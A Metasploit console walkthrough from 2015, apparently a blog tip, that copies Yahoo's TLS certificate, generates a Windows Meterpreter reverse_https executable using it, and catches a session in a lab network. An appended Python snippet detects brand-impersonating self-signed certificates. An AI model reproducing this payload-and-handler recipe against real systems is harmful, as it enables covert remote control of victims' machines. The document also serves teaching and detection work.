Metasploit - reverse_https
2015-11-17 10:39
msf auxiliary(impersonate_ssl) > show options

Module options (auxiliary/gather/impersonate_ssl):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ADD_CN                             no        Add CN to match spoofed site name (e.g. *.example.com)
   CA_CERT                            no        CA Public certificate
   EXPIRATION                         no        Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
   OUT_FORMAT        PEM              yes       Output format (Accepted: DER, PEM)
   PRIVKEY                            no        Sign the cert with your own CA private key
   PRIVKEY_PASSWORD                   no        Password for private key specified in PRIV_KEY (if applicable)
   RHOST                              yes       The target address
   RPORT             443              yes       The target port

msf auxiliary(impersonate_ssl) > set RHOST www.yahoo.com
RHOST => www.yahoo.com
msf auxiliary(impersonate_ssl) > run

[*] Connecting to www.yahoo.com:443
[*] Copying certificate from www.yahoo.com:443
/C=US/ST=California/L=Sunnyvale/O=Yahoo Inc./OU=Information Technology/CN=www.yahoo.com
[*] Beginning export of certificate files
[*] Creating looted key/crt/pem files for www.yahoo.com:443
[+] key: /home/notfound/.msf4/loot/20151117022203_default_116.214.12.74_www.yahoo.com_ke_612544.key
[+] crt: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_ce_987985.crt
[+] pem: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
[*] Auxiliary module execution completed

msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf payload(reverse_https) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf payload(reverse_https) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf payload(reverse_https) > set LPORT 8443
LPORT => 8443
msf payload(reverse_https) > generate -t exe -f /tmp/https.exe -p x86
[*] Writing 73802 bytes to /tmp/https.exe...

msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) > [*] 192.168.1.106:1432 (UUID: 0d7dc065ab206136/x86=1/windows=1/2015-11-17T02:28:16Z) Staging Native payload ...
[*] Meterpreter will verify SSL Certificate with SHA1 hash 9ce474cb2ec1122d77e05dc20f89a9c03266dd81
[*] Meterpreter session 1 opened (192.168.1.103:8443 -> 192.168.1.106:1432) at 2015-11-17 02:28:20 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
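A defender-side view of the certificate used in this session, as an added example that is not part of the original post: it flags TLS observations where a certificate claims an external brand's name but is self-signed or fails chain validation. The event field names, the brand list and the sample records are constructed assumptions, and it assumes the copied certificate is self-signed because no CA_CERT/PRIVKEY was set above.

```python
import ipaddress

# Constructed sensor records; field names are assumptions, not a product schema.
YAHOO_DN = ("/C=US/ST=California/L=Sunnyvale/O=Yahoo Inc."
            "/OU=Information Technology/CN=www.yahoo.com")
SAMPLE_EVENTS = [
    {"server_ip": "192.168.1.103", "server_port": 8443,      # handler from the session
     "subject": YAHOO_DN, "issuer": YAHOO_DN, "chain_valid": False},
    {"server_ip": "203.0.113.10", "server_port": 443,        # CA-issued, validates
     "subject": "/C=US/O=Example Corp/CN=www.example.com",
     "issuer": "/C=US/O=Example CA/CN=Example Issuing CA", "chain_valid": True},
    {"server_ip": "192.168.1.20", "server_port": 8443,       # ordinary internal device
     "subject": "/CN=printer.corp.example",
     "issuer": "/CN=printer.corp.example", "chain_valid": False},
]
EXTERNAL_BRANDS = ("yahoo.com", "example.com")  # assumption: names you do not host
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def common_name(dn):
    """Return the lower-cased CN of an OpenSSL one-line DN, or ''."""
    for part in dn.split("/"):
        if part.startswith("CN="):
            return part[3:].lower()
    return ""

def claims_external_brand(cn):
    name = cn[2:] if cn.startswith("*.") else cn
    return any(name == d or name.endswith("." + d) for d in EXTERNAL_BRANDS)

def score(event):
    """Reasons an observation looks like an impersonated certificate ([] if none)."""
    if not claims_external_brand(common_name(event["subject"])):
        return []
    reasons = []
    if event["subject"] == event["issuer"]:
        reasons.append("self-signed")
    if not event["chain_valid"]:
        reasons.append("untrusted-chain")
    if not reasons:            # brand name with a valid CA chain: nothing to report
        return []
    addr = ipaddress.ip_address(event["server_ip"])
    if any(addr in net for net in RFC1918):
        reasons.append("internal-server-ip")
    if event["server_port"] != 443:
        reasons.append("non-standard-port")
    return reasons

def flag(events):
    scored = ((e, score(e)) for e in events)
    return [(e["server_ip"], e["server_port"], r) for e, r in scored if r]
```

The trust failure is the primary signal; the internal address and port are context for triage, which is why the self-signed printer certificate is not reported.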
References
http://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation